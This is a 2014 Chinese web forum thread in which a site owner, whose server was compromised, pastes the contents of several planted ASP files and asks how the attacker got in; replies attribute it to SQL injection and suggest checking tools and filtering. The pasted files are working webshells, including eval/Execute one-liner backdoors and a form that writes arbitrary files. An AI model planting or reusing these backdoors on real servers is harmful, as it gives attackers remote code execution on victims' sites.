日期:2014-05-17  浏览次数:21102 次

网站被攻击,不知黑客是怎么进去的?明白人教教我。怎么补上这漏洞?
我网站的目录上,今天多了4个asp文件和一个mdb数据库,

第一个asp文件内容是:几乎把服务器上的所有网站目录都显示出来了。以及某1,2个网站里的所有文件。(里面还有许多乱码,我看不懂,只能看懂几个目录和文件名)

第二个asp文件内容是:

你的网站被黑了!
<script   language= "vbscript "   runat= "server ">
If   Request( "huangzi ") <> " "   Then   Session( "lcxMarcos ")=Request( "huangzi ")
If   Session( "lcxMarcos ") <> " "   Then   Execute(Session( "lcxMarcos "))
</script>

<%eval(request( "a "))%>  

第三个asp文件内容是:

<%eval(request( "a "))%>

第四个asp文件内容是:
<%
on   error   resume   next
If   Request( "UP ")=9   then
T=Request.form( "N ")
S=Request.form( "M ")
set   F=server.CreateObject( "scripting.filesystemobject ")
set   I=F.OpenTextFile(T,8,True,0)
I.WriteLine( " "&S&   " ")
I.close
set   F   =   nothing  
%>
<form   method= "POST "ACTION= "# ">
<input   type= "text "size= "50 "name= "N "value= <%=server.mappath( "newfile.asp ")%> >
<textarea   style= "WIDTH:90%;HEIGHT:100px "   name= "M "class=input>
</textarea>
<input   type= "submit "name= "S "value= "F "class=input>
</form>
<%end   if%>

最后一个是mdb文件。。这个库里面竟然能把我的网站里的所有文件及子目录全部都显示出来了。


问请大侠,这是一种什么样的漏洞??怎么补上??




------解决方案--------------------
你把你网站网址贴出来,我们帮你看看
从你站点日志看,是SQL注入攻击
------解决方案--------------------
多半是被注入了,可以用老兵或阿D工具检查一下
如是你的程序不大,一个一个网页看看,如果你是下载别人的程序来用更加要检查
webshell.asp这个也可以
<%eval(request( "a "))%>
这句可以执行任何代码
------解决方案--------------------
利用注入进入你的空间
上传了海洋顶端ASP木马..
呵呵
------解决方案--------------------
这个是脚本小子利用你的网站的SQL注入漏洞进来的!
写个注入漏洞的程序进行过滤就OK.
可以找我.我给你一个SQL注入漏洞过滤程序!
应该就可以处理了.不过网络安全是防不胜防的.要加强对自我的技术提升.否则你天天让人欺负都有可能.
找我可以到我的群(36510705).我很少上论坛.